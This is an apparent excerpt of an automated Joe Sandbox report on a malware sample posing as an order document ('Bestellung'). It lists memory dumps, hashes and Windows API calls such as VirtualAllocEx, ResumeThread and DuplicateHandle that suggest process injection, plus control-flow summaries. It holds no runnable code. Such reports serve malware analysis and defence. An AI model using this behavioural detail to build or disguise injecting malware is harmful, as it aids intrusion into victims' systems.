                                                                            • API ID: AllocVirtual
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0980B186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0980F38D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0980F38D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCEC3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447707955.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f7d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447707955.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f7d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5fb28aadd9650ae05993c4ec15d9b1d8711f8adf1bfcfd7e3756bd21d8dd1c92
                                                                            • Instruction ID: 8ad830a006f3666efada6b05bdb77c78bfab66bc01118d86643f79f2c17f6596
                                                                            • Opcode Fuzzy Hash: 5fb28aadd9650ae05993c4ec15d9b1d8711f8adf1bfcfd7e3756bd21d8dd1c92
                                                                            • Instruction Fuzzy Hash: 9A2150755093808FCB12CF24D994715BF71EF46314F28C5EBD8498B6A7C33A984ADB62
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                                                            • Instruction ID: b8c5df88c65d7372ea7d6ba01e541c916ea971e99effd01fd1d43a73613fb83b
                                                                            • Opcode Fuzzy Hash: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                                                            • Instruction Fuzzy Hash: 8911E6B6904240DFCB15CF10D5C4B16BF72FB94324F24C6A9D8494B657C33AE856DBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 363acdb204a041e328941ae4a67297e6b7b38cd46a79f59b99add56046035aab
                                                                            • Instruction ID: f9dfaad85d86268b648982a0ac07e17f73c5ba15cb50ff870cd3c738e1412782
                                                                            • Opcode Fuzzy Hash: 363acdb204a041e328941ae4a67297e6b7b38cd46a79f59b99add56046035aab
                                                                            • Instruction Fuzzy Hash: CE01A771E047449FE7108A25CD84B66FBD8EF81734F18C469ED094A182D3789844DAB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ee9b4768fd20b9359a984be7911dcf2f0872b772fee65d3da9c6ca2232b8530
                                                                            • Instruction ID: 1cff7752ca3f34fbf0e78512f6baa0a261c55346baebb3991df78c23fb5e472d
                                                                            • Opcode Fuzzy Hash: 7ee9b4768fd20b9359a984be7911dcf2f0872b772fee65d3da9c6ca2232b8530
                                                                            • Instruction Fuzzy Hash: 7BF06D72904344AFE7208A16CD84B66FFE8EB91734F18C55AED084F282D2799C44CAB2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: +`#
                                                                            • API String ID: 0-2200946960
                                                                            • Opcode ID: 3a23b27409694ab17282bd2e904df8a1091f9ff1740ef1bca3ab8514bd34d89a
                                                                            • Instruction ID: cac79348f715ec0ddc86035e98947306c30c850d20c3a1a2fcb16e7421a92e3d
                                                                            • Opcode Fuzzy Hash: 3a23b27409694ab17282bd2e904df8a1091f9ff1740ef1bca3ab8514bd34d89a
                                                                            • Instruction Fuzzy Hash: 1361FA72A142479FC700CFA9CA42B9AFBB5BF89350B15C42BD445EB351C630CA05E791
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Bf*}
                                                                            • API String ID: 0-500971921
                                                                            • Opcode ID: ff9264590135a125fe5c23a50161693fd191cd0da12fa1af712861c1722ebd49
                                                                            • Instruction ID: 558655f2dbc62716b35138f8a870fed47d627e581861dcaa117461b502a1dc9d
                                                                            • Opcode Fuzzy Hash: ff9264590135a125fe5c23a50161693fd191cd0da12fa1af712861c1722ebd49
                                                                            • Instruction Fuzzy Hash: 04514032A0C3865FC705CB788952BAEBFB19F86340729C4ABD445DB252C635DE06E792
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dae918bf3dd46b11f79db54f6077340db2861c569888bc26fe522177eec76002
                                                                            • Instruction ID: eb9ac5a86ee26817cd58adadf85fd053806cfec72897319ed48d5f7becaafe97
                                                                            • Opcode Fuzzy Hash: dae918bf3dd46b11f79db54f6077340db2861c569888bc26fe522177eec76002
                                                                            • Instruction Fuzzy Hash: 1B1270B04117498EE732EF65EC4C5893AB1BB85318F90430BD2E16A2E9DBBE154BDF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 78e98bef8457e2f0c72ff6d34060c9754660c0614a8c23db41915adff9139297
                                                                            • Instruction ID: 56ef8114c20a9f37be168ee3f962a2c36d2c596b1b317d8a463a190f8dbb66a0
                                                                            • Opcode Fuzzy Hash: 78e98bef8457e2f0c72ff6d34060c9754660c0614a8c23db41915adff9139297
                                                                            • Instruction Fuzzy Hash: 0FE10974E002198FDB54DFA9C9909AEFBB2FF89304F248169D415A7395D731AD82CF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 45101be4876d90cdaa87d9972d77043d1298b369e607004cae0103e6f059c53b
                                                                            • Instruction ID: 61fe0e907992e632d8ed33ded13d8595cb18d8b36b468ec0785bf27c6090b545
                                                                            • Opcode Fuzzy Hash: 45101be4876d90cdaa87d9972d77043d1298b369e607004cae0103e6f059c53b
                                                                            • Instruction Fuzzy Hash: E7E1F674E002198FDB18DFA9C9949AEFBB2FF89304F248169D415AB395D731AD42CF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca6f851c8ca22a89d1ad88eea27f86739b6e2442ebf87233471a0c06e6da569e
                                                                            • Instruction ID: 0300e847e512a22a8aad830fada723767ef5d452057cb51a35bb97f8b1c82db6
                                                                            • Opcode Fuzzy Hash: ca6f851c8ca22a89d1ad88eea27f86739b6e2442ebf87233471a0c06e6da569e
                                                                            • Instruction Fuzzy Hash: AEE10974E002198FDB18DFA9C9949AEFBB2FF89304F248159D455A7395D730AD42CF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e085842318d5b9895b584a3411b5ff19aff2f06009010c0e07eae0d497af9251
                                                                            • Instruction ID: fe12248aa1bdd9a7c33c069c3e1cbea16083210b8bcceac38a0bed136f5ac80d
                                                                            • Opcode Fuzzy Hash: e085842318d5b9895b584a3411b5ff19aff2f06009010c0e07eae0d497af9251
                                                                            • Instruction Fuzzy Hash: 9DE1E874E002198FDB14DFA9C990AAEFBB2FF89305F248169D415A7395D731AD82CF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 214ebe09f65f86268f71c7e838b24d23af1728a457e8e0cde47f886a5ccb1775
                                                                            • Instruction ID: c61f5813648507639e07742a6f7cdb4d028c0647e008618777e89d234f2b287b
                                                                            • Opcode Fuzzy Hash: 214ebe09f65f86268f71c7e838b24d23af1728a457e8e0cde47f886a5ccb1775
                                                                            • Instruction Fuzzy Hash: E0E11974E002198FDB14DFA9C990AAEFBB2FF89304F248169D415A7395D731AD82CF61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5c446257b0af0dce425b440c7894da78f030dd985f0c7890b3d6d37450756b2
                                                                            • Instruction ID: cb01d0e7313018a7991b840cabb56a1cf2aaf7cd1eedba1387173930c82bc917
                                                                            • Opcode Fuzzy Hash: d5c446257b0af0dce425b440c7894da78f030dd985f0c7890b3d6d37450756b2
                                                                            • Instruction Fuzzy Hash: 65D1273481075A8ADB10EBA8D950AE9B7B5FFD5300F10CB9AE14937211FB746EC5CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e566ebb8c625bdb3f74f6c10f2b35f8c70c64de05dd58e3d332ba834d22f537
                                                                            • Instruction ID: 5b177fe827a3722e60493d7ee7cb9764391a0b23c708eb38d3d30c30364bdbf8
                                                                            • Opcode Fuzzy Hash: 2e566ebb8c625bdb3f74f6c10f2b35f8c70c64de05dd58e3d332ba834d22f537
                                                                            • Instruction Fuzzy Hash: 00D1183491075A8ADB10EBA8D950AE9B7B1FFD5300F108B9AD1493B221FB746EC5CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cef4881a50cfa725c6f8964c340e3facca60d635a57f41c580eac3e5b7e4384
                                                                            • Instruction ID: f3e42775e137ea203e9e5d43b3802003b4885953496be2c243368833a0f66dcc
                                                                            • Opcode Fuzzy Hash: 3cef4881a50cfa725c6f8964c340e3facca60d635a57f41c580eac3e5b7e4384
                                                                            • Instruction Fuzzy Hash: 04A18D76B002098FCF05DFA4D9449EEB7B2FF88300B15457AE906AB225DB76E946CF40
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3fcec45561444ed2f1fcb6b4edebe632af3a0281142b6ed8626b7a0c25250599
                                                                            • Instruction ID: 16668b27ef20ebd5279126a8b1063d85a320fbafeb5a5f50ce57d22d3fc88d90
                                                                            • Opcode Fuzzy Hash: 3fcec45561444ed2f1fcb6b4edebe632af3a0281142b6ed8626b7a0c25250599
                                                                            • Instruction Fuzzy Hash: B2D1163481075A8ADB10EBA8D950AA9B7B5FFD5300F10CB9AE14937221FB746EC5CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83d60d23d0db9545fd9487a46fbf5fb82b31313853691d91b8bcc37c7dd4e515
                                                                            • Instruction ID: c444960b024396363eb27746d209980761e2c51f48883556127aa8ba301d9d27
                                                                            • Opcode Fuzzy Hash: 83d60d23d0db9545fd9487a46fbf5fb82b31313853691d91b8bcc37c7dd4e515
                                                                            • Instruction Fuzzy Hash: 78911872608342CFC355CB29CA96B567BB1FF86310B15889FD096CF6A1D634DC06EB52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cbc860c966249f9df9f70784a596a7eac4bcc490fcc80ce8a5c5f7d91d81639
                                                                            • Instruction ID: 20b8471162f920468f338ebb21da444ed1027e42dc9bf98569dbd958beab6019
                                                                            • Opcode Fuzzy Hash: 3cbc860c966249f9df9f70784a596a7eac4bcc490fcc80ce8a5c5f7d91d81639
                                                                            • Instruction Fuzzy Hash: 38C1F5B08117498FE732EF69EC4C58A7BB1BB85314F50430BD1A16B2E8DBBA144ADF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a54513fbe8e69228e9f5fcdbe913f981beafa8f55cbf9217a0d0554b1f80d3b0
                                                                            • Instruction ID: 724646dd3f72acdcf47f91ac8e9dc3656314303774b1199391f0c7a322d2bf15
                                                                            • Opcode Fuzzy Hash: a54513fbe8e69228e9f5fcdbe913f981beafa8f55cbf9217a0d0554b1f80d3b0
                                                                            • Instruction Fuzzy Hash: 72510770E002198FDB18DFA9C9916AEFBF2FF89304F248169D418AB355D7359942CFA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f1ea92268c62c5c0d53db2687eb9d6acf15a6dfbfed549e45c7c6fa931c563ff
                                                                            • Instruction ID: 06dea983699335837b439bdfa699c0a86a5e7a8eaccd2e5ac02fb1b4ec923f10
                                                                            • Opcode Fuzzy Hash: f1ea92268c62c5c0d53db2687eb9d6acf15a6dfbfed549e45c7c6fa931c563ff
                                                                            • Instruction Fuzzy Hash: 03510870E002198FDB54CFA9C9905AEFBB2FF89304F248169D418AB355D7359E82CF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b782e980284e3dd40b87ac00471ac588797f57e8f64513a9ce709ea335a129e
                                                                            • Instruction ID: 93d202d0ce7cfae6c521bce64542ff24089370002858a70596537ff54383d6f9
                                                                            • Opcode Fuzzy Hash: 6b782e980284e3dd40b87ac00471ac588797f57e8f64513a9ce709ea335a129e
                                                                            • Instruction Fuzzy Hash: 3041A776E1425A8FCB00CF98CA82B69FBB5FF4C280B15C42AD415EB351C634CA01EB51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b3985b12fa89db4a2a0711c8281c3c19a1baf31c8504ceeb2cc251722da7095d
                                                                            • Instruction ID: aea6e74105c46944d939843de9dd136d717ffceaeeb77e09bb46a477a9c91dab
                                                                            • Opcode Fuzzy Hash: b3985b12fa89db4a2a0711c8281c3c19a1baf31c8504ceeb2cc251722da7095d
                                                                            • Instruction Fuzzy Hash: FC41C172A14607CFC794CF69CA82B6AB7F1FF84310B14886AE15ACBA60D334ED40DB41
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2347b26ed4354ed37eb73138f2c719ce7409a1c416f4d81b0b384740e187156e
                                                                            • Instruction ID: b1a9d25443892a21f44281882c15fb0ff9ab7b23580b9be4f20016611d4987a9
                                                                            • Opcode Fuzzy Hash: 2347b26ed4354ed37eb73138f2c719ce7409a1c416f4d81b0b384740e187156e
                                                                            • Instruction Fuzzy Hash: 9F41B172A106078FC794CF69CA82B6AB7F5FB84310F24886AE15ACB660D634ED51DB41

                                                                            Execution Graph

                                                                            Execution Coverage:7.6%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:96
                                                                            Total number of Limit Nodes:10
                                                                            execution_graph (drawn as an interactive graph in the report; the raw node/edge dump is not reproduced here). Windows APIs reached from the graphed code in this dump: CreateActCtxA, KiUserCallbackDispatcher, GetModuleHandleW, DuplicateHandle.

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: c20841aeca253f20beb56a1af964ce381f94d8b89cc2a2b61e872425735e281e
                                                                            • Instruction ID: 8ab9f9ca0c71d462bfb84ade095457bcf7c93cc03388b66759205a6691e17aba
                                                                            • Opcode Fuzzy Hash: c20841aeca253f20beb56a1af964ce381f94d8b89cc2a2b61e872425735e281e
                                                                            • Instruction Fuzzy Hash: 43716970A00B098FE724DF6AD84475ABBF6FF88600F008A6DD44AD7B40DB75E846CB94

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 16d670f (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 60: 16d670f-16d6711 → 61, 62
                                                                            • 61: 16d6788-16d681c, calls DuplicateHandle → 67, 68
                                                                            • 62: 16d6713-16d671a → 64, 65
                                                                            • 64: 16d671c-16d6720 → 65
                                                                            • 65: 16d6721-16d6749, call 16d611c → 70
                                                                            • 67: 16d681e-16d6824 → 68
                                                                            • 68: 16d6825-16d6842
                                                                            • 70: 16d674e-16d6774
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: c6d4ebaffe30ce920facd3a747ecf9d9efa3bde8d0cc4fd3365b22c70758582e
                                                                            • Instruction ID: f9ec3ff060cc9b59e8227ad773d21cf20eea915c817cb5044707a20b38a8c704
                                                                            • Opcode Fuzzy Hash: c6d4ebaffe30ce920facd3a747ecf9d9efa3bde8d0cc4fd3365b22c70758582e
                                                                            • Instruction Fuzzy Hash: C0414876900249AFCF11CF99D844ADEBFFAFB48320F15802AE914A7311D739A911DFA0

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 16d7364 (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 75: 16d7364-16d736e → 76, 77
                                                                            • 76: 16d7375-16d7431, calls CreateActCtxA → 79, 80
                                                                            • 77: 16d7370-16d7374 → 76
                                                                            • 79: 16d743a-16d7494 → 87, 88
                                                                            • 80: 16d7433-16d7439 → 79
                                                                            • 87: 16d7496-16d7499 → 88
                                                                            • 88: 16d74a3-16d74a7 → 89, 90
                                                                            • 89: 16d74a9-16d74b5 → 90
                                                                            • 90: 16d74b8 → 91
                                                                            • 91: 16d74b9 → 91 (self-loop)
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 016D7421
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 5730307b7c98a3ddcbd98fd617c583a65e76073f3622dab69523931a8ae47306
                                                                            • Instruction ID: 6a6380c0c71a634397b4ca0c1581fe2521cacdf2b25d5f6c4e48af76a697799c
                                                                            • Opcode Fuzzy Hash: 5730307b7c98a3ddcbd98fd617c583a65e76073f3622dab69523931a8ae47306
                                                                            • Instruction Fuzzy Hash: 2C41BFB1C01719CFEB25CFAAC844B8EBBB5BF49704F24806AD408AB251DB756946CF91

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 16d6414 (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 93: 16d6414-16d7431, calls CreateActCtxA → 97, 98
                                                                            • 97: 16d743a-16d7494 → 105, 106
                                                                            • 98: 16d7433-16d7439 → 97
                                                                            • 105: 16d7496-16d7499 → 106
                                                                            • 106: 16d74a3-16d74a7 → 107, 108
                                                                            • 107: 16d74a9-16d74b5 → 108
                                                                            • 108: 16d74b8 → 109
                                                                            • 109: 16d74b9 → 109 (self-loop)
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 016D7421
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 534f44fe2a225c74c6c72c907de8c9ad648162a705602be1ad3ce499b8af9c41
                                                                            • Instruction ID: 999982808ebc19d962e120323bfe6a91e92c7f7033b00d1761c424658b443220
                                                                            • Opcode Fuzzy Hash: 534f44fe2a225c74c6c72c907de8c9ad648162a705602be1ad3ce499b8af9c41
                                                                            • Instruction Fuzzy Hash: BC41C1B0C0171DCFEB25DFA9C844B9EBBB5BF48704F20806AD408AB251DB756946CF91

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 16d611c (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 111: 16d611c-16d681c, calls DuplicateHandle → 114, 115
